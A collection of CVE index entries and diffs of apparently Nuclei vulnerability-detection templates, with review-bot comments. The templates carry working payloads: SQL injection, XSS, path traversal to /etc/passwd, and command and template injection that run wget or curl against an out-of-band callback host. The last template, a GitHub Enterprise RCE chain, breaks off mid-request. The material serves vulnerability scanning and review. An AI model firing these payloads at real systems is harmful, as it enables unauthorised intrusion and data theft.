{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"}
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}


@ -1 +1 @@
56b04172c1df6906eb35bc5859e652a2
6cee9d81045ba3fb25589784532a78e4


@ -2,7 +2,7 @@ id: open-redirect
info:
name: Open Redirect Detection
author: princechaddha
author: princechaddha,AmirHossein Raeisi
severity: medium
tags: redirect,dast
@ -172,11 +172,11 @@ http:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1
- type: status
status:
- 301
- 302
- 307
# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e9bf67056b260dc2bc0f200f2d1853287f4f9b916a9a10f53fc7e643868df3200221008daacf7355ba1c40d34b672e78c096110e60601fdd1afa5932cd69b109c27d18:922c64590222798bb761d5b6d8e72950
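Review bot: In the `Location` regex the host part still has no boundary in front of `evil\.com`, so `(?:[a-zA-Z0-9\-_\.@]*)evil\.com` also accepts a host that merely ends in that string (a constructed example: `notevil.com`), and the matcher can report a redirect that the injected value did not cause. Dropping the `?` after the scheme group removes the bare relative-path match, but the label run would be tighter if it had to end in a separator, e.g. `(?:[a-zA-Z0-9\-_\.@]*[\.@])?evil\.com`. The same pattern appears with `oast\.me` in the CVE-2015-2863 section further down. The matcher list starts above this hunk, so the other regex entries should be checked for the same gap.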


@ -4,7 +4,7 @@ info:
name: Microsoft Azure Takeover Detection
author: pdteam
severity: high
description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource.
description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a D>
reference:
- https://godiego.co/posts/STO/
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
@ -25,33 +25,30 @@ dns:
matchers:
- type: word
words:
- "azure-api.net"
- "azure-mobile.net"
- "azurecontainer.io"
- "azurecr.io"
- "azuredatalakestore.net"
- "azureedge.net"
- "azurefd.net"
- "azurehdinsight.net"
- "azurewebsites.net"
- "azurewebsites.windows.net"
- "blob.core.windows.net"
- "cloudapp.azure.com"
- "cloudapp.net"
- "database.windows.net"
- "redis.cache.windows.net"
- "search.windows.net"
- "servicebus.windows.net"
- "trafficmanager.net"
- "visualstudio.com"
- type: word
words:
- "NXDOMAIN"
- NXDOMAIN
- type: dsl
dsl:
- 'contains(cname, "azure-api.net")'
- 'contains(cname, "azure-mobile.net")'
- 'contains(cname, "azurecontainer.io")'
- 'contains(cname, "azurecr.io")'
- 'contains(cname, "azuredatalakestore.net")'
- 'contains(cname, "azureedge.net")'
- 'contains(cname, "azurefd.net")'
- 'contains(cname, "azurehdinsight.net")'
- 'contains(cname, "azurewebsites.net")'
- 'contains(cname, "azurewebsites.windows.net")'
- 'contains(cname, "blob.core.windows.net")'
- 'contains(cname, "cloudapp.azure.com")'
- 'contains(cname, "cloudapp.net")'
- 'contains(cname, "database.windows.net")'
- 'contains(cname, "redis.cache.windows.net")'
- 'contains(cname, "search.windows.net")'
- 'contains(cname, "servicebus.windows.net")'
- 'contains(cname, "trafficmanager.net")'
- 'contains(cname, "visualstudio.com")'
extractors:
- type: dsl
dsl:
- cname
# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d68568731abdd8cfc97f8e47d3886209656605e7c73bfe62944a9d0d440bdd0d0221009fbd2c17dbd3f8faf9eae5e17223431a603a59249c6d151b36f22bbd4723ad6c:922c64590222798bb761d5b6d8e72950
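Review bot: The second `description:` line, which looks like the new value, ends in `when a D>` and so appears to have been cut off at the editor or terminal width; the full sentence from the line printed above it should be restored. Separately, the `dsl` matcher uses `contains(cname, "…")`, which is a substring test, so a CNAME that only embeds one of these names in the middle would also satisfy it. A suffix comparison would be stricter, provided the value is normalised first (a trailing dot is possible), which is worth confirming. `matchers-condition` sits above the hunk, so how the `NXDOMAIN` and `dsl` matchers combine cannot be confirmed from here.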


@ -193,4 +193,9 @@ dns:
words:
- ".iidns.com"
# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950
- type: word
part: answer
name: ksyun
words:
- ".ksyunwaf.com"
# digest: 490a00463044022005bf81b04ee9a74169b2ea8baf29b776c3da72d7bf13cdf16f62a84baa003daf0220758d7619504e7c6a45cc29f1e7f3c71f7cbba93b4444cf419ddc9b01d486d265:922c64590222798bb761d5b6d8e72950


@ -18,10 +18,9 @@ file:
- "/2011/n325423.shtml?"
- "wyle"
- "\\~ISUN32.EXE"
condition: or
condition: and
- type: binary
binary:
- "80382B7503C6002D80382F7503C6005F"
# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e80f4b2dd4f9e9816231f6df6fe61c3565dece76d808a3a46eb8834f63cf0400022100a6c76dfe0cf46ebb373f0eb870535044d5b9cbb980fc1ec329159a2ca6e263e6:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,37 @@
id: CNVD-2017-06001
info:
name: Dahua DSS - SQL Injection
severity: high
author: napgh0st,ritikchaddha
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
metadata:
max-request: 1
verified: true
fofa-query: app="dahua-DSS"
tags: cnvd,cnvd2017,sqli,dahua
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
- "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "XPATH syntax error:"
- "c8c605999f3d8352d7bb792cf3fdb25"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950
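Review bot: The second body word, `c8c605999f3d8352d7bb792cf3fdb25`, is a hard-coded 31-character value that appears to be the MD5 of the `num` variable with its last character cut off by the error message. Nothing links the two, so changing `num` would silently break the matcher. A comment on that line would make the dependency visible, e.g. `# md5(num) as echoed in the XPATH error, truncated to 31 chars; update together with num`. The `info` block also has no `description:`, which the other templates added in this commit carry.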


@ -12,7 +12,6 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
- https://www.exploit-db.com/exploits/33159/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -31,18 +30,17 @@ info:
http:
- raw:
- |
GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
unsafe: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201815e842a6507b325c3c41ae861767b65c91d7bd0ecd902cb49d98f19d29271e022100f2778429020bce6c05a2f84057ce4f23a7070d63855d64359c7779a19600d4e4:922c64590222798bb761d5b6d8e72950


@ -2,7 +2,7 @@ id: CVE-2015-2863
info:
name: Kaseya Virtual System Administrator - Open Redirect
author: 0x_Akoko
author: 0x_Akoko,AmirHossein Raeisi
severity: medium
description: |
Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
@ -39,5 +39,5 @@ http:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1
# digest: 490a0046304402204d2a37c6eb68a653c40afd87277f8343eb3e10c0bdd4316cd611f7ebc1e852ba022079d43910950fd7200f43f450956b7541df0fe79b603c2941ddc6ac3e7a2bb177:922c64590222798bb761d5b6d8e72950


@ -26,7 +26,7 @@ info:
max-request: 1
vendor: thoughtworks
product: gocd
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: cve2021,cve,go,lfi,gocd,thoughtworks
http:
@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d0200eeb5397b87ed805111ba73b1f44e9e642500d7a6b71f5b6a960dc8d1549022050d924940eadf44a9064cfa5bcaa5f15133215a9364c377111696b5ac33dd637:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: apache
product: spark
shodan-query: title:"Spark Master at"
tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm
tags: cve2022,cve,apache,spark,kev,packetstorm
variables:
command: "echo CVE-2022-33891 | rev"
@ -45,4 +45,4 @@ http:
part: body
words:
- "19833-2202-EVC"
# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220463f0c1d447513c69079b7f58a07d158405b058efb1e70a43cd3d08ab170875b022100b7e623399aedd2ebfae7b507b9a2b8c756b4a26e4decc54486d72e32770775cd:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,48 @@
id: CVE-2023-29827
info:
name: Embedded JavaScript(EJS) 3.1.6 - Template Injection
author: ritikchaddha
severity: critical
description: |
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.
impact: |
High impact as it enables remote code execution.
remediation: |
Update EJS to the latest version to mitigate the vulnerability.
reference:
- https://github.com/mde/ejs/issues/720
- https://github.com/mde/ejs/blob/main/SECURITY.md#out-of-scope-vulnerabilities
- https://nvd.nist.gov/vuln/detail/CVE-2023-29827
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-29827
cwe-id: CWE-74
epss-score: 0.34849
epss-percentile: 0.97005
cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: ejs
product: ejs
framework: node.js
tags: cve,cve2023,ssti,rce,ejs,oast
http:
- method: GET
path:
- "{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "You are viewing page number"
# digest: 4b0a00483046022100d7ea0d1d7ce9e00af5998f5fa4b5960a70b471e26ecf0caf0577424bace640e0022100ba8f5c9f03136d87aa25b2eab3b136501334d2a57e61dbf0d049f384be7946e1:922c64590222798bb761d5b6d8e72950
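Review bot: The `name` says EJS 3.1.6 while `description` and `cpe` both say 3.1.9; the version should be made consistent so that findings are triaged against the right release. The request path `/page` and the body word `You are viewing page number` look specific to one sample application, so a non-match says nothing about other applications that pass request data into EJS options. A comment above the path such as `# fingerprints the reference demo app only` would state that limit. The second reference points at the project's out-of-scope list, so the `critical` rating may deserve a short justification in the description.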


@ -0,0 +1,43 @@
id: CVE-2023-35158
info:
name: XWiki - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
impact: |
Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
remediation: |
Update XWiki to the latest version to mitigate the Reflected XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-35158
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-35158
cwe-id: CWE-87
epss-score: 0.00105
epss-percentile: 0.42103
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: xwiki
product: xwiki
shodan-query: "XWiki"
tags: cve,cve2023,xwiki,xss
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"
matchers:
- type: dsl
dsl:
- 'contains(body, "href=\"javascript:alert(document.domain)\">Cancel</a>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100c6c91bc1cafbd787223af97e5547530e8543d2a73bdc2cfb85cedd488a7e695b022006c285923b223b83c2a2d0b7436f826f8058fb22a2641e34fef6c20843b50804:922c64590222798bb761d5b6d8e72950
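Review bot: `remediation` only says to update to the latest version although the description already names the fixed releases; `Upgrade to XWiki 14.10.5, 15.1-rc-1 or later.` would give operators a version they can check against. The description also contains a stray `>` after `such as:` that looks like a leftover quote marker and should be dropped.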


@ -0,0 +1,44 @@
id: CVE-2023-36347
info:
name: POS Codekop v2.0 - Broken Authentication
author: princechaddha
severity: high
description: |
A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
impact: |
Successful exploitation could lead to unauthorized access to sensitive information.
remediation: |
Implement proper authentication mechanisms and ensure secure user session management.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36347
cwe-id: CWE-306
epss-score: 0.00103
epss-percentile: 0.41216
cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
metadata:
vendor: codekop
product: codekop
tags: cve,cve2023,codekop,pos,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/excel.php"
- "{{BaseURL}}/pos-kasir-php/excel.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Document"
- type: word
part: header
words:
- "application/vnd.ms-excel"
# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950
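Review bot: The two matchers accept any response with an Excel content type and `<title>Document` in the body, whatever its status code, and neither string is specific to POS Codekop. A status matcher for 200, as the other templates in this commit have, plus a body word taken from the export itself would cut false positives. The `info` block also has no `reference:`, and `metadata` has no `max-request` although two paths are requested.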


@ -0,0 +1,64 @@
id: CVE-2023-43374
info:
name: Hoteldruid v3.0.5 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data or complete takeover of the affected system.
remediation: |
Upgrade Hoteldruid to a patched version that addresses the SQL Injection vulnerability.
reference:
- https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-id_utente_log-parameter-8b89f014004947e7bd2ecdacf1610cf9
- https://nvd.nist.gov/vuln/detail/CVE-2023-43374
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43374
cwe-id: CWE-89
epss-score: 0.00076
epss-percentile: 0.31944
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: digitaldruid
product: hoteldruid
shodan-query: title:"HotelDruid"
fofa-query: title="HotelDruid"
tags: cve,cve2023,hoteldruid,cms,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /hoteldruid/inizio.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "HotelDruid</a>"
internal: true
- raw:
- |
POST /hoteldruid/personalizza.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(body, "HotelDruid:")'
condition: and
# digest: 4a0a00473045022100e833bee8477a7d35d428595751237754df5f6dcd346f312d7bd3b39aff1ce502022073b0e42e337aadd7c1cd77196e08e3ecada460c031dca3ecfd850b727521655f:922c64590222798bb761d5b6d8e72950
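Review bot: `duration>=5` in the second request is the only evidence of the injected delay, so a host that is simply slow to answer `personalizza.php` meets all three DSL conditions and is reported as critical. The first request in the flow may be usable as a timing baseline. Failing that, the limitation should be recorded next to the matcher, e.g. `# time-based: a uniformly slow server also satisfies duration>=5`.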


@ -0,0 +1,52 @@
id: CVE-2023-44813
info:
name: mooSocial v.3.1.8 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.
impact: |
Successful exploitation could lead to unauthorized access or data theft
remediation: |
Upgrade to a patched version of mooSocial
reference:
- https://github.com/ahrixia/CVE-2023-44813
- https://nvd.nist.gov/vuln/detail/CVE-2023-44813
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-44813
cwe-id: CWE-79
epss-score: 0.00069
epss-percentile: 0.28937
cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: moosocial
product: moosocial
shodan-query: http.favicon.hash:702863115
tags: cve,cve2023,moosocial,xss
http:
- method: GET
path:
- "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "initInviteFriendBtn('model');alert(document.domain)//;"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100acfa09d8753734777ae264a34a2301092b20f0e9752d3c46a2c1cd62a768413a02204a56fbddcb961f4ecc0a6a20bde95cc3eaef3f8e5f60254eec300b6c960addbb:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,47 @@
id: CVE-2023-45855
info:
name: qdPM 9.2 - Directory Traversal
author: DhiyaneshDk
severity: high
description: |
qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade qdPM to a non-vulnerable version to mitigate the directory traversal vulnerability.
reference:
- https://github.com/SunshineOtaku/Report-CVE/blob/main/qdPM/9.2/Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-45855
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-45855
cwe-id: CWE-22
epss-score: 0.00087
epss-percentile: 0.35946
cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:*
metadata:
vendor: qdpm
product: qdpm
shodan-query: http.favicon.hash:762074255
tags: cve,cve2023,qdpm,lfi
http:
- method: GET
path:
- "{{BaseURL}}/uploads/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Index of /uploads</title>"
- "attachments/</a>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100cbd700fb07947d7ab0657ac97cf57a41ceb390ba95b91f5ebd3eb5dc4ed2246b02210086b07d8dd2293a1fc75a3d80d0c9dcf34ddff95b979e4eccefddd9d1fc606ee3:922c64590222798bb761d5b6d8e72950
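Review bot: Nothing in the matchers identifies qdPM: `Index of /uploads</title>` together with `attachments/</a>` is satisfied by any server that has directory listing enabled on an `/uploads/` folder containing an `attachments` entry. A product fingerprint (a preceding request or a qdPM-specific string) would keep the finding tied to the CVE. Failing that, a comment such as `# matches generic autoindex output; does not confirm the product` is worth adding. The `lfi` tag also reads oddly for a check that observes a directory listing rather than a file read.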


@ -0,0 +1,52 @@
id: CVE-2023-5991
info:
name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
author: Kazgangap
severity: critical
description: |
The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
remediation: Fixed in 4.8.5
reference:
- https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5991
cwe-id: CWE-22
epss-score: 0.00603
epss-percentile: 0.78412
cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: motopress
product: hotel_booking_lite
framework: wordpress
publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp
http:
- method: GET
path:
- "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "/etc/passwd"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950
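Review bot: The name and description cover both download and deletion, but the request only exercises `mphb_action=download`, so a match demonstrates the file read and says nothing about deletion. A comment above the path, e.g. `# read-only check: verifies the download action only`, would make clear what a positive result proves. The description sentence is also missing its closing full stop.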


@ -0,0 +1,144 @@
id: CVE-2024-0200
info:
name: Github Enterprise Authenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
reference:
- https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
- https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
- https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5
- https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3
- https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0200
cwe-id: CWE-470
epss-score: 0.0037
epss-percentile: 0.72517
cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
metadata:
vendor: github
product: enterprise_server
shodan-query: title:"GitHub Enterprise"
fofa-query: app="Github-Enterprise"
verified: true
tags: cve,cve2024,rce,github,enterprise
variables:
username: "{{username}}"
password: "{{password}}"
oast: "curl {{interactsh-url}}/?"
padstr: "{{randstr}}"
payload: '{{padding(oast,padstr,300)}}'
marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
final_payoad: "{{ b64_marshal_data + '--' + digest}}"
http:
- method: GET
path:
- "{{BaseURL}}/api/v3/user/orgs"
headers:
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
extractors:
- type: json
part: body
name: org_name
internal: true
json:
- ".[].login"
- method: GET
path:
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
headers:
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
matchers-condition: and
matchers:
- type: word
words:
- '"role": "admin"'
part: body
- method: POST
path:
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
headers:
Content-Type: application/json
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
body: |
{
"name": "{{randstr}}"
}
matchers:
- type: status
status:
- 201
- method: GET
cookie-reuse: true
path:
- "{{BaseURL}}/login"
extractors:
- type: regex
part: body
internal: true
group: 1
regex:
- 'name="authenticity_token" value="(.*?)"'
name: csrf_token
- method: POST
path:
- "{{BaseURL}}/session"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
matchers:
- type: status
status:
